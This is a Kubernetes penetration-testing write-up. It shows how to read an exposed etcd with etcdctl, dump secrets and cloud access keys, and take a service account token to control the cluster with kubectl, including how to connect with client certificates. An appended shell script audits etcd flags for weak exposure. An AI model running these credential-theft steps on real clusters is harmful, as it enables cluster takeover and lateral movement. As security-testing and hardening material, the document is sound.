K8s Penetration Testing: Exploiting etcd
[Penetration Testing]
ETCD
etcd is the key-value database that stores Kubernetes cluster state. When it is misconfigured, or reachable through SSRF, access to etcd amounts to taking over the cluster. It runs on the K8s master node and exposes port 2379 internally; on the local host, 127.0.0.1 can be accessed without authentication, while other addresses require the --endpoints parameter plus a cert for authentication.
Documentation
- https://kubernetes.io/zh/docs/concepts/overview/components/
- https://etcd.io/docs/
Unauthenticated access
etcd v2 and v3 are two incompatible APIs; K8s uses v3. Select API v3 via an environment variable:
export ETCDCTL_API=3
Check that the connection works:
etcdctl endpoint health
127.0.0.1:2379 is healthy: successfully committed proposal: took = 939.097µs
List the K8s secrets:
etcdctl get / --prefix --keys-only | grep /secrets/
Retrieve cloud-provider access keys (AK) stored in the cluster, for lateral movement:
etcdctl get /registry/secrets/default/acr-credential-518dfd1883737c2a6bde99ed6fee583c
Read a service account token:
etcdctl get / --prefix --keys-only | grep /secrets/kube-system/clusterrole
Near the end of the returned value, take the part that starts at `ey` and ends just before the trailing `#kubernetes.io/service-account-token` marker.
Authenticate to the API server with that token and take over the cluster:
kubectl --insecure-skip-tls-verify -s https://127.0.0.1:6443/ --token="[ey...]" -n kube-system get pods
When authentication is required
Try to read etcd data:
etcdctl get / --prefix --keys-only
Error: dial tcp 127.0.0.1:2379: getsockopt: connection refused
The connection to local port 2379 is refused; netstat shows that etcd is listening on a 172.x address instead. In this case you must specify the endpoint and present a cert; if authentication fails, the error returned is `Error: context deadline exceeded`.
[root@iZbp13l0dv5x8ke1jmrpihZ cert]# netstat -antp | grep LISTEN
tcp 0 0 127.0.0.1:10248 0.0.0.0:* LISTEN 2917/kubelet
tcp 0 0 127.0.0.1:10249 0.0.0.0:* LISTEN 4801/kube-proxy
tcp 0 0 172.16.0.112:2379 0.0.0.0:* LISTEN 3222/etcd
tcp 0 0 172.16.0.112:2380 0.0.0.0:* LISTEN 3222/etcd
tcp 0 0 127.0.0.1:10253 0.0.0.0:* LISTEN 4628/cloud-controll
tcp 0 0 127.0.0.1:10257 0.0.0.0:* LISTEN 4134/kube-controlle
tcp 0 0 127.0.0.1:10259 0.0.0.0:* LISTEN 4150/kube-scheduler
tcp 0 0 127.0.0.1:33941 0.0.0.0:* LISTEN 2917/kubelet
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 3465/sshd
Accessing etcd with a cert
[root@iZbp13l0dv5x8ke1jmrpihZ cert]# ls
172.16.0.112-name-1.csr 172.16.0.114-name-3.csr ca.pem etcd-server.pem
172.16.0.112-name-1-key.pem 172.16.0.114-name-3-key.pem etcd-client.csr peer-ca-config.json
172.16.0.112-name-1.pem 172.16.0.114-name-3.pem etcd-client-key.pem peer-ca.csr
172.16.0.113-name-2.csr ca-config.json etcd-client.pem peer-ca-key.pem
172.16.0.113-name-2-key.pem ca.csr etcd-server.csr peer-ca.pem
172.16.0.113-name-2.pem ca-key.pem etcd-server-key.pem
[root@iZbp13l0dv5x8ke1jmrpihZ cert]# etcdctl --insecure-skip-tls-verify --insecure-transport=true --endpoints=https://172.16.0.112:2379 --cacert=ca.pem --key=etcd-client-key.pem --cert=etcd-client.pem endpoint health
https://172.16.0.112:2379 is healthy: successfully committed proposal: took = 2.084526ms
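As an added defensive check (not part of the original write-up), the script below audits an etcd command line for the two conditions the steps above rely on: a client URL bound beyond loopback without --client-cert-auth=true, or a plaintext http:// client URL. --listen-client-urls and --client-cert-auth are real etcd flags; the sample command lines are constructed, not taken from a real host.

```bash
#!/bin/sh
# Added audit helper (not from the original post). On a live master node the
# input would come from: ps -o args= -C etcd

# Print the value of --<name>=<value> (or "--<name> <value>") from the command
# line in "$2"; prints nothing when the flag is absent.
etcd_flag() {
    printf '%s\n' "$2" | tr ' ' '\n' | awk -v f="--$1" '
        index($0, f "=") == 1 { sub("^" f "=", ""); print; exit }
        $0 == f               { getline v; print v; exit }'
}

# Print one FINDING line per weakness in the etcd command line "$1".
# Always returns 0 so callers can count lines; no output means no findings.
audit_etcd_cmdline() {
    urls=$(etcd_flag listen-client-urls "$1")
    auth=$(etcd_flag client-cert-auth "$1")
    for u in $(printf '%s\n' "$urls" | tr ',' ' '); do
        case "$u" in
            http://*) echo "FINDING: plaintext client URL $u" ;;
        esac
        case "$u" in
            *://127.0.0.1:*|*://localhost:*) ;;   # loopback only: local access
            *) [ "$auth" = "true" ] ||
                   echo "FINDING: $u is reachable without client cert auth" ;;
        esac
    done
    return 0
}

# Constructed samples: a hardened kubeadm-style line and a weak one.
HARDENED_ETCD='/usr/bin/etcd --name=node1 --listen-client-urls=https://127.0.0.1:2379,https://172.16.0.112:2379 --client-cert-auth=true --trusted-ca-file=/etc/etcd/cert/ca.pem'
WEAK_ETCD='/usr/bin/etcd --name=node1 --listen-client-urls=http://0.0.0.0:2379 --advertise-client-urls=http://172.16.0.112:2379'

audit_etcd_cmdline "$WEAK_ETCD"   # prints two FINDING lines
```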